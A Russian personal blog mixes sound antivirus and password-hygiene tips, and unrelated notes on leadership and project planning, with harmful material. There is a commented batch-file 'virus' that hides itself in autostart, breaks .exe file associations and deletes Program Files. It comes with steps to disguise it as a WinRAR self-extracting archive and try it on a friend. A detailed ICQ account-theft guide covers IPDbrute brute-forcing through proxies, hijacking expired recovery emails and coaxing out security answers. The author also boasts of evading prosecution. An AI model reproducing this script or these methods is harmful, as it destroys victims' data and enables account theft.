Признаки присутствия вредоносных программ на компьютере.

Написано: четверг, 23 декабря 2010 г. автор Я
0

Явные проявления:
Внезапное и несанкционированное изменение настроек браузера
Необычные всплывающие окна и другие сообщения
Неожиданный несанкционированный дозвон в Интернет

Косвенные признаки заражения компьютера:
Самопроизвольное блокирование антивирусной программы
Невозможность загрузки файлов с веб-сайтов антивирусных компаний
Необоснованные на первый взгляд сбои в работе операционной системы или других программ
Почтовые уведомления с заслуживающих доверие сайтов об отправке пользователем инфицированных сообщений

Скорая помощь, если вы заразились:
Отключите компьютер от интернета.
Отключите компьютер от локальной сети.
Сохраните важную для Вас информацию на внешний носитель (дискету, CD-диск, флэш-карту и пр.).
Установите антивирусную программу (если она еще не установлена) с последними обновлениями антивирусных баз.
Запустите полную проверку Вашего компьютера.
В случае возникновения вопросов по лечению компьютера обратитесь в Службу технической поддержки компании, чьей антивирусной программой Вы пользуетесь.

Правила предотвращения заражения:
Вовремя устанавливать последние обновления
Проводить проверку любого сменного носителя (дискета, лазерный диск, flash-память и др.)
Не загружать из Интернет файлы неизвестного происхождения, илипрограммы, устанавливать их.
Не открывать электронные письма, полученные от незнакомых людей или имеющие подозрительную тему сообщения
Если на компьютере установлен антивирус:
НЕ выключать постоянную проверку,
обновлять антивирусные базы (не реже одного раза в три дня),
проводить проверку всего диска каждую неделю
Использование брандмауэра
Использовать антиспамовую программу
Создание вредоносных программ или сознательно их распространять может привести вас к уголовному кодексу РФ -лишение свободы на срок до 5 лет, НО ЧЕСТНО ГОВОРЯ Я НЕ РАЗУ НЕ ПОПАДАЛСЯ, САМОЕ ГЛАВНОЕ НЕ НАПАДАТЬ ВИРУСАМИ НА ОРГАНИЗАЦИИ И НА ИНСТИТУТЫ, ЧТОБЫ НЕ СПАЛИТЬСЯ.

Краткая классификация угроз

Написано: автор Я
0

Вредоносные программы:
Компьютерный вирус
Программа, которая заражает другие объекты (сектора, программы, документы и др.)
Черви
Программы, проникающие на компьютер и распространяющие свои копии по локальным и/или глобальным сетям.
Троянские программы
Программы, проникающие и осуществляющие различные несанкционированные пользователем действия (используют ресурсы компьютера, собирают информацию, принимают или отсылают файлы, запускают и уничтожают их, выводят сообщения, стирают информацию, перезагружать компьютер и т. д.)
В результате эти троянцы могут быть использованы для обнаружения и передачи конфиденциальной информации, для запуска вирусов, уничтожения данных и т. п. — пораженные компьютеры оказываются открытыми для злоумышленных действий хакеров.
Спам
Анонимная массовая не запрошенная рассылка.
Сетевые атаки
Несанкционированная попытка получения контроля над информационной системой или организации отказа работы сети/компьютера.
Например: DoS-атака, или атака типа отказ в обслуживании, ставит своей целью исчерпать ресурсы информационной системы. В случае успешного проведения DoS-атаки система перестает выполнять возложенные на нее функции, становится недоступной.
Riskware (Потенциально опасные программы)
Программы не являются вредоносными сами по себе, однако обладают функционалом, которым могут воспользоваться злоумышленники для причинения вреда пользователям. Они представляют потенциальную опасность для компьютера, при хакерских атаках, для рассылки спама и т.д.
Adware (Рекламные системы)
Программное обеспечение, предназначенное для показа рекламных сообщений (чаще всего в виде графических баннеров) и/или перенаправление поисковых запросов на рекламные Web-страницы

Основы защиты своего компьютера

Написано: автор Я
0

Следите за тем, к чему даёте общий доступ

Это может показаться странным, но зачастую злоумышленнику не нужно выполнять никаких лишних телодвижений и пользоваться вредоносными программами. Всё что нужно сделать, это просто зайти на общие ресурсы и скачать то что ему нужно.
Проблема часто проявляется в файлобменных сетях, таких как DC. Начинающие пользователи очень часто "расшаривают" целый диск, со всеми его папками и файлами, тем самым отдавая на общее пользование все свои личные файлы и пароли.
Если вы не храните пароли в текстовом файле, но пользуетесь какой-либо программой, использующей пароль и имеющей функцию сохранения последнего, и вы открыли общий доступ к установленной этой программе, то этот пароль может быть скачан злоумышленником.
Всё дело в том, куда приложение сохраняет пароль. Часто приложение сохраняет его в свой конфиг, находящийся в той же папке, что и приложение.

Запомните: никогда не открывайте доступ к установленной программе, использующей пароли, если ей пользуетесь.

Открывать доступ можно только к тем данным, которые вы действительно хотите сделать "публичными".
Лучше потратить пару минут и выбрать все "разрешенные" папки, чем расшарить "что под руку попалось" и отдать злоумышленнику ценную информацию.

Всё что выше в основном относится к доступу "на чтение", т.к. доступ на запись ещё более опасен.
Разрешать запись можно только в специально отведённую для этого папку, т.к. злоумышленник легко может заменить или модифицировать находящиеся в ней файлы, в том числе с целью "заразить" файл. Так же стоит заметить, что многие черви распространяются именно через общие ресурсы, к которым есть доступ на запись.

Можете даже провести эксперимент в целью узнать есть ли в вашей сети подобного рода черви.
Создаёте общую папку и киньте в неё исполняемый файлам (.exe), после чего разрешите изменение файлов по сети.
Если в сети есть компьютер зараженный червём, распространяющимся через общие папки, то через некоторое время антивирус скажет что файл был заражен :)
Игнорируйте сообщения в ICQ от неизвестных контактов

Наверно каждому кто пользуется ICQ или каким-либо другим интернет мессенджером приходили сообщения вида "Вот мои фотки, какраз как ты любишь", "Смотри что про тебя написали на форуме", "Хочешь 6-знак? Качай эту программу, взламывающую любой шестизнак по ICMP протоколу", "Оцени новый скринсейвер" и т.д.
К такому сообщению обычно прилагается ссылка на сайт или файл, который предлагается открыть или скачать.
99.9% подобных сообщений отправляются злоумышленниками с целью "засадить" вам вирус или троян для кражи вашей информации или захвата вашего

Сообщения с ссылками на файл являются самыми распространёнными т.к. этот файл и содержит вредоносный код.
Очень часто злоумышленники пытаются обмануть невнимательного пользователя заменой расширения файла.
Например ссылки на фотки обычно имею вид: http://site.ru/photos/me.pif. Очень похоже на "нормальную" картинку, однако если присмотреться к расширению, то можно заметить, что это pif, a не gif. GIF - это картинка, а PIF - ярлык для DOS программы и является исполняемым!!! После запуска PIF файла, на ваш компьютер будет загружена основная вредоносная программа.

Сообщения на сайты чаще всего появляются при обнаружении уязвимостей в браузерах. Если в браузере есть критическая ошибка, то при заходе на такой сайт, злоумышленник может выполнить произвольный код на вашем компьютере. И опять же на ваш компьютер будет загружен вирус или троян. Также ссылка якобы на страницу форума, на самом деле может вести на файл, который начнёт скачиваться. В данном случае злоумышленник расчитывает на невнимательность пользователя, вдруг он нажмет "Открыть" вместо "Сохранить" или "Отмена" :)

Вобщем, будьте внимательны, и игнорируйте сообщения подобного содержания. Отвечать на эти сообщения тоже нет смысла, т.к. они отправляются ботом многим тысячам людей. Также стоит добавить, что сообщения подобного вида может прийти и от друга, если его компьютер заражен.
Игнорируйте "Спам"

Ситуация примерно как с ICQ, но относится к электронной почте.
Никогда не открывайте вложения в письма от неизвестных людей! Это может оказаться вирус, даже если ваш антивирус "молчит".
Также стоит внимательно относиться и к письмам от знакомых, а именно стоит обращать внимание на "левые" вложения, когда не планировалось обмениваться файлами. Данные вложения могут прицепляться вирусами.
Не открывайте неизвестные файлы

Лучше не стоит испытывать судьбу и открывать файлы, скачанные из ненадёжных источников, таких как общие файловые шары, ФТП сервера, "левые" сайты и тд.
Обычно вредоносные файлы, размещаемые на общих ресурсах, имеют очень "громкие" и вызывающие названия, которые побуждают пользователя запустить файл.
Именно к таким файлам стоит относиться с особой осторожностью, даже если антивирус говорит что файл чистый!
Возможно это новый вирус, который ещё не обнаруживается антивирусом. Таким образом вы рискуете стать первым, кто "протестирует" свежий вирус.
Используйте сложные пароли

Если некоторый ресурс или данные представляют для вас ценность, то стоит позаботиться о стойких паролях.
Никогда не ставьте пароли, являющиеся словами, состоящими только из цифр и длинной меньше 5 символов.
Стойким паролем является тот, который состоит из цифр и букв разного регистра, расположенных случайным образом.
Например такой "lH9m1". Это "минимальный" пароль. Желательно чтобы он был длиннее.

Рассмотрим на примере почему.
Если вы поставили числовой пароль размером 5 символов, то чтобы его подобрать,
в худшем случае нужно перебрать 10^5=100000 комбинаций. Если принять что на проверку одного пароля тратится 1 секунда, то уже через 27 часов пароль будет найден. Реально же это время может оказаться меньше.
Если пароль состоит из слова, например на английском языке, то его подбор вообще может занять 5 минут т.к. перебираются не все возможные комбинации, а слова.

Теперь предположим что пароль состоит из цифр и букв английского алфавита в разном регистре.
10 цифр + ( 26 букв * 2 регистра) = 62 символов на знак.
62^5 = 916132832 комбинаций или 254481 часов ожидания =)
Сравните разницу при одинаковом размере пароля.
Отключите автозапуск "Флэшек"

Чего полезного в автозапуске флэшки? Да ровным счётом ничего!
Зато он очень сильно понижает безопасность. Многие вирусы и черви распространяются именно через флешки при помощи автозапуска.
Когда вы вставляете "чистую" флешку в зараженный компьютер, вирус копирует себя на флэшку и устанавливает автозапуск себя любимого. Теперь флешка заражена. Если её вставить в компьютер со включенным автозапуском, то первым что запустится будет вирус!
Отключается автозапуск очень просто:

Создаём текстовый файл со следующим содержимым:

Листинг : Файл для отключения автозапуска

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
";NoDriveTypeAutoRun"=dword:000000b5


После этого переименовываем файл из .txt в .reg и запускаем двойным кликом. Это поменяет в реестре указанный ключик и отключит автозапуск съемных дисков, к которым относятся "флэшки".
Избегайте скачивание софта с "общих" сайтов

В интернете очень много различного рода файловых порталов, на которые любой желающий может загрузить файл, чем охотно пользуются злоумышленники. При вредоносные программы редко распространяются в "чистом" виде. Чаще всего они внедряются в популярный софт для маскировки. Так же иногда, для привлечения внимания, пишут что вышла новая версия такой то программы, хотя на самом деле этой версии ещё нет. Естественно запуская эту "самую свежую" версию любимой программы вы получаете старую версию с самым свежим вирусом. =)
Вообще все программы лучше всего качать с их официальных сайтов или доверенных источников.
Следите за обновлением софта

Программы пишут люди, которым свойственно допускать ошибки. Чем большее число людей участвуют в разработке программы, тем больше в ней может оказаться ошибок, незаметных с первого взгляда, но безусловно ставящих под угрозу безопасность пользователя. Всегда следите за исправлениями и выходом новых версий программ, особенно тех, которые используются для работы в сети. Также стоит следить за выходом критических обновлений для операционной системы, в народе называемых "заплатками".
Помните что когда обнаруживается критическая ошибка, безопасность вашего компьютера резко падает.
Храните личную информацию в тайне

Иногда злоумышленники просят пользователя сообщить некоторую личную информацию, представляясь сотрудниками компаний, с которыми работает "жертва". Например если вы пользуетесь кредитной картой, то можете получить письмо, якобы от банка, в котором сообщается что вам срочно нужно перейти по ссылке на сайт банка и заполнить указанную форму иначе будут проблемы. При этом сайт является точной копией оригинального, а адрес очень похожим.

Запомните, ни один провайдер/банк или ещё кто не могут потребовать от вас такую личную персональную информацию как пароль!
Установите антивирус

Роль антивируса в обеспечении безопасности переоценить довольно сложно. Можно соблюдать самые жесткие правила по обеспечению безопасности и обмениваться данными только с доверенными источниками, но даже при здесь существует вероятность того, что ваш компьютер может быть подвергнут заражению вирусом. Одна ошибка и можно потерять важные данные. Антивирус конечно не является панацеей, и главной составляющей безопасности, он скорее всего "завершает" защиту. Однако просто установить антивирус недостаточно. важно поддерживать его базы в актуальном состоянии, иначе он неспособен будет противостоять новым вирусам.

Компьютеные вирусы и защита от них.

Написано: автор Я
0

Компьютерный вирус - это специально написанная небольшая программа, которая может приписывать себя к другим программам (то есть заражать их), а также выполнять различные вредные действия на компьютере.
 ИЛИ ТАКОЕ ОПРЕДЕЛЕНИЕ:
Компьютерный вирус - программа, которая может "размножаться" и скрытно внедрять свои копии в файлы, документы и загрузочные сектора дисков.
В настоящие время известно несколько десятков тысяч компьютерных вирусов самых различных модификаций (новый вирус появляется каждую неделю).


В результате заражения происходят следующие феномены, которые являются признаками заражения компьютера (они обусловлены деструктивными свойствами вирусов):
некоторые программы перестают работать или работают с ошибками;
размер некоторых исполнимых файлов и время их создания изменяются. В первую очередь это происходит с командным процессором, его размер увеличивается на величину размера вируса;
на экран выводятся посторонние символы и сообщения, появляются странные видео и звуковые эффекты;
работа компьютера замедляется и уменьшается размер свободной оперативной памяти;
некоторые файлы и диски оказываются испорченными (иногда необратимо, если вирус отформатирует диск);
компьютер перестает загружаться с жесткого диска.

Зараженными также оказываются дискеты с завирусованного компьютера, и компьютеры, связанные с ним по сети.

Вирусы поражают прежде всего exe и com файлы программ и не поражают текстовые файлы DOS (txt файлы).

Кроме вирусов, деструктивными свойствами обладают троянские программы. Если вирус проникает в компьютер незаметно, то троянскую программу пользователь сам записывает на диск, полагая, что это полезная программа. Но при определенных условиях она может начать свою разрушительную работу.

Пути заражения компьютера вирусами:
Через зараженные дискеты;
Через компьютерную сеть.

Других путей нет. Самозародиться вирусы не могут - это программа, специально написанная человеком для разрушения программного обеспечения компьютера и его системных областей. Типичный размер вируса составляет от десятков байт до десятков килобайт.

Компьютерные вирусы бывают следующих типов:
Файловые вирусы, поражающие exe и com файлы, иногда только com. Первым заражается командный процессор, а через него все остальные программы. Наиболее опасны резидентные вирусы, которые остаются в оперативной памяти постоянно. Заражение происходит при запуске зараженной программы (хотя бы однократном), то есть когда вирус получает управление и активизируется. Такие вирусы портят программы и данные, но иногда могут уничтожить содержимое всего жесткого диска.
Загрузочные или бутовые вирусы - поражают загрузочные сектора жестких дисков и дискет. Они наиболее опасны для компьютера, так как в результате их разрушительной работы компьютер перестает загружаться, иногда сразу после заражения, которое происходит даже при выводе оглавления зараженной дискеты.
Вирусы, поражающие драйверы, указанные в файле config.sys, и дисковые файлы DOS. Это ведет к прекращению загрузки компьютера.
Вирусы DIR, меняющие файловую структуру.
Невидимые или стелс-вирусы. Их очень трудно обнаружить. Простейший способ маскировки - при заражении файла вирус делает вид, что длина файла не изменилась.
Самомодифицирующиеся вирусы. Они меняют свою структуру и код по случайному закону и их очень трудно обнаружить. Их называют также полиморфными. Две копии одного и того же вируса этого типа могут не содержать одинаковых последовательностей байт.
Сетевые вирусы - поражают машины, работающие в сети, в том числе в сети Интернет.
Вирусы Word (6.0 и старше), Excel, Access, PowerPoint, - поражают документы и макросы программ из MS Office.
Вирусы Windows - функционируют и портят данные в среде Windows.

Один из самых опасных из всех известных вирусов из Интернета - вирус "Чернобыль". Вирус активизируется 26 апреля, но модификации вируса могут принести вред и 26 числа каждого месяца. Кроме порчи информации на диске, он перепрограммирует BIOS (CMOS Setup) компьютера и компьютер перестает загружаться. Приходится обращаться в мастерскую и восстанавливать BIOS.

Вирус ILOVEYOU филиппинского происхождения, распространялся по E-mail. Он вывел из строя 45 млн. компьютеров во всем мире, в том числе в Пентагоне, ЦРУ, ФБР в США, Форин-офисе Великобритании и в других крупнейших странах. Вскоре фирус мутировал, так как были созданы его разновидности, и нанес дополнительный ущерб. Основная вирусная атака произошла 4 мая 2000 г. Вирус уничтожал графические jpg и звуковые mp3 файлы. Материальный ущерб составил около 10 миллиардов $ (USD). В России ущерб был сравнительно невелик - около 1000 компьютеров.

Методы борьбы с компьютерными вирусами:
Резервное копирование всех программ, файлов и системных областей дисков на дискеты, чтобы можно было восстановить данные в случае вируссной атаки. Создание системной и аварийной дискеты.
Ограничение доступа к машине путем введения пароля, администратора, закрытых дисков.
Включение антивирусного протектора от загрузочных вирусов в CMOS Setup машины. Защита дискет от записи.
Использование только лицензионного программного обеспечения, а не пиратских копий, в которых могут находиться вирусы.
Проверка всей поступающей извне информации на вирусы, как на дискетах, CD-ROM, так и по сети.
Применение антивирусных программ и обновление их версий.
Подготовка ремонтного набора дискет (антивирусы и программы по обслуживанию дисков).
Периодическая проверка компьютера на наличие вирусов при помощи антивирусных программ.

Наиболее эффективны  программы AVAST, ESET nod 32, Kaspersky, Dr. Web, ADinf, AVP, BootCHK, Norton Antivirus, Dr. Solomon. Антивирусная база AVP для DOS и для Windows содержит информацию о более чем 28000 вирусов. Причем она ежедневно обновляется. Информация содержится на сайте в интернете http://www.avp.ru/. Есть также Dr.Web для DOS и для Windows.


Лечение дисков производится только при загрузке машины с системной дискеты, иначе не будут удалены резидентные вирусы.

Для запуска программы Dr.Web для DOS надо запустить файл drweb.exe и после проверки ОЗУ компьютера нажать F5 и указать путь тестирования. Для лечения диска надо нажать Ctrl-F5 и указать путь тестирования. Если указана "*", то это означает тестирование всего жесткого диска. Для тестирования дискет надо указать путь a: или b:. Для тестирования CD-ROM надо указать путь d:. Для начала тестирования - Enter. После окончания тестирования выход из программы - Alt-X. Программа Drweb содержит эвристический анализатор вирусов и является наиболее эффективной. После окончания работы программы надо создавать файл отчета report.dwb и просматривать его.

Формат команды для запуска программы AidsTest для тестирования жесткого диска: aidstest * /g /f /s, для дискеты: aidstest a: /g /f /s или aidstest b: /g /f /s.

Однако программа AidsTest сильно устарела и имеет лишь историческое значение.

Для запуска антивирусной программы AVP для DOS надо запустить файл avp.exe в каталоге AVP_DOS, затем выбрать область тестирования (диски С: или A:) и указать мышью кнопку "Пуск". Программа AVP весьма эффективна и имеет очень высокую скорость работы.

Еще более эффективна программа AVP для Windows. После окончания тестирования выход из программы - Alt-X. После окончания работы программы надо создавать файл отчета report.txt и просматривать его.



В заключение темы приведем два простых правила, соблюдая которые Вы легко предотвратите потерю ценной информации на случай сбоя или заражения машины вирусом:

Правило N1. Создав любой новый файл (содержащий, например, текст, программу или рисунок), обязательно сразу скопируйте его на дискету.

Правило N2. Любую дискету, побывавшую на чужой машине, обязательно проверьте антивирусными программами с обновленными антивируссными базами.

Некоторые антивирусы можно скачать здесь и бесплатно -----     нажми     -----

Написано: пятница, 17 декабря 2010 г. автор Я
0

 @Echo off (запрещаем вывод на экран исполняемых команд)
Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно)
Date 13.09.96 (эта строка изменяет дату)
If exist c:ski.bat goto abc (проверяет существует ли файл, …..)
Copy %0 c:ski.bat (копирует вирус только изменив названия)
Attrib +h c:ski.bat ( делает файлу ski.bat атрибут скрытый
Echo c:ski.bat >>autoexec.bat (Прописывает файл ski.bat в автозагрузку
:abc ( ……если он существует, то программа перейдет на метку :abc)
md PRIDUROK                                                                                                                            
md LUZER                                                                                                                                         
md DURAK (Создает пустые папки)
md LAMER
Label E: PRIDUROK (CD-ROM будет называться PRIDUROK)
assoc .exe=.mp3 (запускает все ексшники как музыка )
del c:Program Files (удаляет все файлы из этой папки)
Echo VIRUS LOAD (Выводит надпись)
 

Итак мы написали простой вирус. Теперь нажимаем ФАЙЛ>>СОХРАНИТЬ КАК, и в поле имя файла пишем, например virus.bat
.bat обязательна везде. Появился значок MS-DOS. Так что бы жертва не смогла увидеть его код будем использовать WIinRar. Берем наш вирусочек и кидаем его в архив вылетит окно и ты просто ставишь галочку «создать SFX-архив. Далее заходим в дополнительное и открываем параметры SFX там есть строка выполнить после распаковки и ты пишешь РЕАЛЬНОЕ имя твоего вируса. Видишь простой блокнот вступил как вирусосоздатель, а WinRar сделал якобы  программу….выводы делать тебе. И смотри не попадись сам на это. Не принимай файлы в NETе от незнакомых людей и смотри на размер файла.
 

ВНИМАНИЕ!!! НЕ ПРОВЕРЯЙ ВИРУС У СЕБЯ!
                  (Лучше у друга)))
Если запустил вирус у себя то хана,
опять создай "1.txt" и там пиши assoc .exe=exefile
сохрани в .bat, и опять запусти, перезагрузку и всё)))

Лидер и руководитель

Написано: автор Я
0

             Лидер и руководитель.
                  Сходство и различие.
Лидер - это ведущий человек, ведущий за собой и способный пробудить интерес к делу.
Руководитель – это лицо, на которое официально возложены функции управлением коллективом и организации его деятельности.

Навыки публичного выступления

Написано: автор Я
0

    Навыки публичного выступления.
1.Тело и движения:
1.1.Внешность (парадная (помогает завоевать уважение)).
1.2.Визуальный контакт до 5 секунд со слушателем вовлекает его.
1.3.Удобная поза позволяет расслабиться и выступающему, и аудитории.
1.4.Демонстрирует компетентность говорящему.
1.5.Жесты и выражения лица показывают воодушевление и чувства.
2.Голос и интонация:
2.1.Язык добавляет выразительности, пробуждает интерес у слушателей.
2.2.Использование пауз, позволяет свежо дышать и думать.
2.3.Разнообразия интонаций, показывает имоции, предаёт ясность выступлению.
3.Содержание.
3.1.Способы привлечения внимания слушателей: плакаты, иллюстрации, слайды, графики, диаграммы, вопросы к аудитории, раздаточные материалы, время для вопросов и ответов.
3.2.Юмор, снижает напряжение.

Имидж

Написано: автор Я
0

                            Имидж.
                 Как быть всегда в форме.
Одежда, характер, стиль
Имидж (лат.)- вид.
1.Габитарный - внешний вид (одежда, обувь и т.п.)
2.Средовой – окружающая среда
3.Опосредованный – то, что вышло из-под рук человека.
4.Вербальный – речь
5.Кинестетический – жесты, мимика, походка

Правила подготовки презентации проекта

Написано: автор Я
0

Правила подготовки презентации проекта.
1.Актуальность проекта (проблема).
2.Цель проекта.
3.Задачи проекта.
4.Участники.
5.Место проведения.
6.Сроки проведения.
7.Механизм реализации (основные этапы проекта, организационные формы).
8.Оценка.
9.Мониторинг.
10.План описания мероприятия.
11.Ресурсы.
12.Предполагаемые партнёры.
13.Ожидаемые результаты.

Этапы подготовки проекта

Написано: автор Я
0

         Этапы подготовки проекта.
1.Оформление проекта.
2.Название проекта.
3.Руководители.
4.Краткое описание.
5.Денежная сумма
6.Постановка проблемы.
7.Цель.
8.Достижимость поставленной цели.
9.Мероприятие и сроки.
10.Смета.
11.Демолизация смета.

Этапы проектирования

Написано: автор Я
0

                Этапы проектирования.
1.Уяснение проблемы?
2.Социальный заказ.
3.Паспортизация.
4.Получение точных данных.
5.Описание и состояние функционированого развития.  
6.Постановка цели.
7.Постановка задач.
8.Прогнозирование.
9.Нормативное прогнозирование.
10.Не записанное.
11.Конструкт- форматирование теоретического знания.
12.Проект системы.


Проектирование

Написано: автор Я
0

                      Проектирование.
Progectus- брошенный вперёд
Любой социальный проект направлен на изменение чего-либо. Проект начинается с идеи, поиском единомышленников и сотрудников, поиском ресурсов и желание дойти до конца.
Краткая структура проекта.
Кто? – организаторы проекта.
С кем? – участниками.
Зачем? – цель, идея проекта.
Когда? – время проведения.
Где? – место проведения.
Что делали? – содержание, план действий.
Чем всё это закончилось? – Ожидаемый результат.

Как анализировать работу?

Написано: автор Я
0

           Как анализировать работу?
1.Что мне удалось и почему?
2.Как можно использовать это?
3.Что мне не удалось и почему?

1.Какие знания и опыт я приобрёл?
2.1.Какая моя ближайшая цель?
2.2.Что я должен сделать, чтобы её достичь.
3.Каким было моё настроение и от чего оно зависело?
4.Чем я мог помочь другим и чем помогли мне?
5.Какое моё физическое настроение.





Чего не хватает?!

Написано: четверг, 16 декабря 2010 г. автор Я
0

Чтобы вы хотели увидеть или загрузить в нашем блоге?

Как взломать ICQ

Написано: воскресенье, 10 октября 2010 г. автор Я
0

Первый способ

Ipdbrute биг фак или как угнать асю?

Надоело сидеть на длиннющем кривом слоне? Так в чем проблема утяни себе короткий уин и покажи всему инету на сколько ты крут!

С чего мы начнем? Наверно для тебя уже не секрет что шестизначные уины регились очень давно и тогда при регистрации вписывать мыло (которое кличут праймари) было обязательно. Вот. На это мыло пароль будет приходить всегда Делаем вывод, что у каждого шести и семи-значного уина есть праймари на который ты сорвешь пароль. Вроде понятно, а вроде как вообще ничего не понятно. Так вот, многие (наверное 90% имхо) мыл регились на бесплатных серваках, а там существуют свои правила. Например если ты не пользуешся своим ящиком (например на hotmail.com) больше трех месяцев то твое мыло становится свободным и любой его может зарегить и юзать. Ну и если на это мыло зареген уин, то он и уин будет юзать. Вот так вот и получается...Кто-то забыл о своем мыле (на которое регил свой уин) кто-то вводил несуществующее мыло например eprst@hotmail.com , кто-то ушел в плаванье и не юзал мыло. В общем, оно свободно, ты просто его региш. Вроде все ясно как день, но ты меня спросишь, а откуда я знаю, на какие ящики регились такие-то номера? Я тебе скажу. Хорошие люди собрали и выложили в сеть базы примари. Выглядит так уин - праймари. То есть ты уже знаешь на какое мыло зареген такой то уин. . . Поэтому руками проверить все мылы на валидность не получится. Но тебе поможет программа Advanced Maillist Verify - кряк найдешь сам smile С помощью этой программки ты узнаешь, какой майл из твоего списка существует, а какой - нет. Но дело в том, что некоторые мыльные сервера кое-что там изменили у себя, поэтому на хотмыле и помоему мсне эта прога не рулит. В общем это я описал один способ угона уина который становится все менее актуален но до сих пор рулит. Так как люди вумные пишут подобные проги, которые реально все проверяют. Но просят за это деньги.



А сейчас перейдем к самому имхо реальному способу угона аськи! К IPDbrute2/udc2 Pro.

Вот как он выглядит.



1)Threads - Это количество потоков подбора пароля. Че мелочиться? Ставте 100! (хотя реальное число одновременно открытых сокетов в системе - ограничено)

Alive - Количество потоков подбора пасса в данный момент.

2)Password remains Сколько паролей ему еще предстоит проверить.

bad - Это уже проверенные пароли которые попадают в отстой, не валидные они.

good - Это ваш скажем так улов, правильные пароли, то, что вы набрутили!

3)Proxies - Количество прокси-серверов, которые вы заливали, good - рабочии прокси, alive те прокси, что используются в данный момент.

3)Speed pps(Password Per Second)Cколько паролей проверяется в секунду. У меня, как видели 10, в общем чем выше скорость, тем, разумеется, лучше.

В общем с общим видом мы ознакомились а теперь приступим к настройкам.

Надеюсь, брутфорс вы уже скачали? и вам еще понадобится Программа для генерации списков вида UIN;password. Так теперь создаем у себя на винте папку условно назовем ее "icqhack" в нее кидай генератор и брутфорс. Так. Теперь создаем четыре текстовых документа. Один для проксей (так и называем его "proxy") второй для валидных паролей, назовем его например "zaebis!" туда будут лететь набрученые вами аськи. И третий документ в котором будут генерированные уины (с которого будет реализовываться сканирование) условно назовем его "uinfuck" Четвертый текстовик - назовем его "bad", туда будут сливаться не правильные пароли. И для желающих можно создать еще один документ с паролями (я так делаю всегда) Делаем текстовик, называем его pass и кидаем туда буквально три пароля. И увеличиваем свои шансы в трое, но этим мы уменьшаем диапазон уинов, которые мы должны просканить, но это не важно. Итак, запускаем генератор.



1)Диапазон который будет генерить, у меня стоит по умолчанию, Вы пишите свой.

2)password это по умолчанию. Не забудьте поменять на свой например 1221 и у вас получится

уин;1221

уин;1221

уин;1221 И так далее...То есть Вы будете подбирать уин под пароль 1221.*это пример пароля, юзайте свои* Как думаете, из несколько десятков тысяч уинов, хоть на одном будет стоять такой пароль? Хех конечно, суть улавливаете?!

Это один способ генерации. Но, как Вы заметили, на скрине есть еще циферка три возле надписи словарь. Помните, мы создали документ под названием pass? Вот пишем в него три каких то пароля, больше не надо. Пример 111222 222111 112211 вписали, терь вот что делаем: ставим галочку где написано "словарь"



Как видно из скрина, Вы даете путь на ваш словарь и теперь и после генерации у вас вот что получается:

147852;111222

147852;222111

147852;112211

147853;111222

147853;222111

147853;112211

Фишку поняли? Теперь уин подбирается не к одному паролю, как мы делали выше, а к трем! Но придется сканить меньший диапозон. Поэтому решайте сами... Итак, с генерилкой думаю разобрались, теперь будем настраивать сам брутфорс.

Значит открываем его и нажимаем кнопочку - Config

1)Source uin;pass list file - Путь к текстовому документы куда слились ваши уин;пасс если я не ошибаюсь мы называли его "uinfuck" ну вы поняли smile

2)Threads - Кол-во потоков, о которых мы говорили выше. Ставьте 100

3)Dump incorrect passwords to this file даем путь к текстовику "bad", в который будут сваливаться неправильные пароли.

4)Dump correct passwords to this file - мы его по-моему называли "zaebis" даем на него путь и сюда будут сваливаться ваши честно угнанные уины. Правильные сочетания уин пасс в общем.

5)Proxies list file - Помните, мы создавали текстовик под названием "proxy"? Вот на него и даем путь потому что брутус работает через прокси, иначе мираблы вас забанят.

6)Cleanup every XX minutes - как вы знаете, прокси умеют умирать и тем самым уменьшать скорость сканирования. Поэтому тут выставляем промежутки времени через которые программа будет "чистить", удалять плохие прокси.

7) Change password - как только попадется правильное сочетание уин пасса программа автоматически поменяет на нем пароль. Удобно.

Теперь жмем OK и нажимаем start.

Удачного брута!

Второй способ

Писать инструкцию о том, как взломать номер icq, как украсть номер icq, я не буду, но рассказать о том, как обычно действуют те, кто ставит себе цель взломать номер icq, думаю стоит. Хотя бы для того, чтобы вы имели представление о том, что такое кража icq.

1. Первый вариант как украсть icq (взломать номер icq) самый банальный и трудоемкий. В этом случае кража номера icq производится методом подбора пароля к номерам UIN icq. Но, чтобы взломать номер icq подобным образом надо быть необычайный счастливчиком. Если, конечно, отбросить тот факт, что некоторые способны использовать в качестве пароля комбинацию цифр 123456. Обладателей подобных пассвордов кража номера icq ждет в первую очередь.

2. Существует еще один популярный способ взломать номер icq, который срабатывает, если в информационном поле “Номер icq и e-mail” программы “светится” бесплатный почтовый адрес владельца (например, sehr_zlyuk@mail.ru). Кража номера icq в этом случае начинается со “взлома” почтового ящика. Взломать “мыло” можно сгенерировав новый пароль, для этого лишь надо правильно ответить в почтовой системе на вопрос, который владелец ящика назначил для самого себя при регистрации.

В прошлом году один журнал опубликовал статистику, согласно которой лидером по популярности является контрольный вопрос “Имя моей любимой собачки”. А чтобы получить ответ на этот вопрос достаточно “случайно” познакомиться и чуть-чуть пообщаться с самим владельцем посредством того же самого icq. После того как ящик захвачен, происхоидт кража номера icq. Чтобы взломать номер icq сайте www.icq.com отправляется прошение создать и выслать новый пароль к свежеукраденному номеру icq.

3. Но все же в большинстве icq, кража которых состоялась, никаких e-mail-адресов в информационных полях вообще не было указано. Специалисты поддержки icq в этом случае все списывают на работу “троянских программ”, дескать, которые попадают к вам в операционную систему и кража номера происходит из-за упущений антивирусной защиты.

4. Люди, которые задавались вопросами, как украсть номер icq и как взломать номер icq, рекомендуют незатейливые программы, с помощью которых можно украсть icq. На одном из сайтов с заголовком как украсть icq я нашел следующее описание программы IPDbrute.

IPDbrute (collection) - самый быстрый генератор паролей к аськам с возможностью вести подбор через HTTP(S)-прокси. Умеет работать в несколько потоков, поддерживает 16-тиричные пароли, поддерживает списки uin на проверку, удаляет “умершие” прокси и многое другое. C помощью этой программы можно взломать номер icq.


5. Еще одна уязвимость icq может показаться на первый взгляд сомнительной, однако задуматься об этом стоит. ICQ-Rambler. Специалисты не исключают, что кража номера icq может произойти по причине утечки базы данных учетных записей пользователей с сервера ICQ-Rambler.

